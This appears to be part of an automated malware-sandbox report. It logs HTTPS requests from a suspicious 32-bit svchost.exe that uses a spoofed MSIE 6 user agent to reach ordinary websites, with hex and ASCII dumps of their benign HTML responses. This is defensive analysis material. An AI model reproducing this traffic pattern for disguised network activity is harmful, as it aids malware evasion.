                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6576INData Raw: 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e
                                                                                                                                                                                                                                                                          Data Ascii: readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).con
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6584INData Raw: 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70
                                                                                                                                                                                                                                                                          Data Ascii: 6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' rep
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6592INData Raw: 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f
                                                                                                                                                                                                                                                                          Data Ascii: ript' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6632INData Raw: 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 20 74 79 70 65 3d 22 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e
                                                                                                                                                                                                                                                                          Data Ascii: co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg" type="" sizes="32x32"/><link rel="apple-touch-icon" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-con
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6640INData Raw: 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 44 61 74 61 66 6f 72 6d 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d
                                                                                                                                                                                                                                                                          Data Ascii: tem-text"><span class="menu-text">Dataform</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:48 UTC6648INData Raw: 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a
                                                                                                                                                                                                                                                                          Data Ascii: var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.j


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          61192.168.2.6519535.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6182OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6215INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6215INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6231INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6247INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6263INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6279INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          62192.168.2.6518535.214.171.193443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6214OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: flamingorecordings.com
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6289INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 75193
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          ETag: "6459edff-125b9"
                                                                                                                                                                                                                                                                          Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                                                                          X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6289INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 73 74 6f 72 65 2c 6d 61 78 2d 61 67 65 3d 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 20
                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="cache-control" content="no-store,max-age=0" /> <meta name="robots" content="noindex"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6305INData Raw: 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 35 39 2e 30 33 31 20 31 39 35 2e 32 36 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 36 33 2e 32 35 38 20 31 39 38 2e 39 34 38 20 36 31 2e 31 34 34 20 31 39 37 2e 31 31 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 34 37 2e 32 32 35 20 31 39 35 2e 32 36 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 35 31 2e 34 35 32 20 31 39 38 2e 39 34 38 20 34 39 2e 33 33 38 20 31 39 37 2e 31 31 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 39 37 2e 31 31 20 33 35 2e 34 31 39 20 31 39 35 2e
                                                                                                                                                                                                                                                                          Data Ascii: fill="#fff"/><polygon points="197.11 59.031 195.268 61.144 197.11 63.258 198.948 61.144 197.11 59.031" fill="#fff"/><polygon points="197.11 47.225 195.268 49.338 197.11 51.452 198.948 49.338 197.11 47.225" fill="#fff"/><polygon points="197.11 35.419 195.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6321INData Raw: 20 31 31 33 2e 31 35 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 36 33 2e 32 35 38 20 31 31 36 2e 38 33 34 20 36 31 2e 31 34 34 20 31 31 34 2e 39 39 36 20 35 39 2e 30 33 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 20 31 31 33 2e 31 35 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 35 31 2e 34 35 32 20 31 31 36 2e 38 33 34 20 34 39 2e 33 33 38 20 31 31 34 2e 39 39 36 20 34 37 2e 32 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 31 31 34 2e 39 39 36 20 33 35 2e 34 31 39 20 31 31 33 2e 31 35 34 20 33 37 2e 35 33 32 20 31 31 34 2e 39 39 36 20 33 39 2e 36 34 36 20 31 31 36 2e 38 33 34 20 33 37 2e 35
                                                                                                                                                                                                                                                                          Data Ascii: 113.154 61.144 114.996 63.258 116.834 61.144 114.996 59.031" fill="#fff"/><polygon points="114.996 47.225 113.154 49.338 114.996 51.452 116.834 49.338 114.996 47.225" fill="#fff"/><polygon points="114.996 35.419 113.154 37.532 114.996 39.646 116.834 37.5
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6337INData Raw: 34 2e 39 32 31 20 32 34 30 2e 30 34 32 20 31 34 32 2e 38 30 38 20 32 33 38 2e 32 30 33 20 31 34 30 2e 36 39 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 37 2e 35 36 35 20 32 35 30 2e 33 31 36 20 32 32 35 2e 34 35 31 20 32 34 38 2e 34 37 38 20 32 32 33 2e 33 33 37 20 32 34 36 2e 36 33 38 20 32 32 35 2e 34 35 31 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 32 34 38 2e 34 37 38 20 32 31 35 2e 37 35 39 20 32 35 30 2e 33 31 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 31 2e 35 33 31 20 32 34 36 2e 36 33 36 20 32 31 33 2e 36 34 35 20 32 34 38 2e 34 37 38 20 32 31 35
                                                                                                                                                                                                                                                                          Data Ascii: 4.921 240.042 142.808 238.203 140.694" fill="#fff"/><polygon points="246.638 225.451 248.478 227.565 250.316 225.451 248.478 223.337 246.638 225.451" fill="#fff"/><polygon points="248.478 215.759 250.316 213.645 248.478 211.531 246.636 213.645 248.478 215
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6353INData Raw: 38 20 39 34 2e 34 34 38 20 32 30 33 2e 39 35 32 20 39 36 2e 32 38 36 20 32 30 31 2e 38 33 38 20 39 34 2e 34 34 38 20 31 39 39 2e 37 32 35 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 20 39 32 2e 36 31 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 39 32 2e 31 34 36 20 39 36 2e 32 38 36 20 31 39 30 2e 30 33 32 20 39 34 2e 34 34 38 20 31 38 37 2e 39 31 39 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 70 6f 69 6e 74 73 3d 22 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33 20 39 32 2e 36 31 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 38 30 2e 33 34 20 39 36 2e 32 38 36 20 31 37 38 2e 32 32 36 20 39 34 2e 34 34 38 20 31 37 36 2e 31 31 33
                                                                                                                                                                                                                                                                          Data Ascii: 8 94.448 203.952 96.286 201.838 94.448 199.725" fill="#fff"/><polygon points="94.448 187.919 92.61 190.032 94.448 192.146 96.286 190.032 94.448 187.919" fill="#fff"/><polygon points="94.448 176.113 92.61 178.226 94.448 180.34 96.286 178.226 94.448 176.113


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                          63192.168.2.6523994.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6215OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                          Accept: *
                                                                                                                                                                                                                                                                          Accept-Language: en-us
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          Host: diamir.de
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6247INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Wed, 05 Jul 2023 06:07:47 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                          Content-Length: 162
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Location: https://www.diamir.de/
                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                          2023-07-05 06:07:47 UTC6247INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


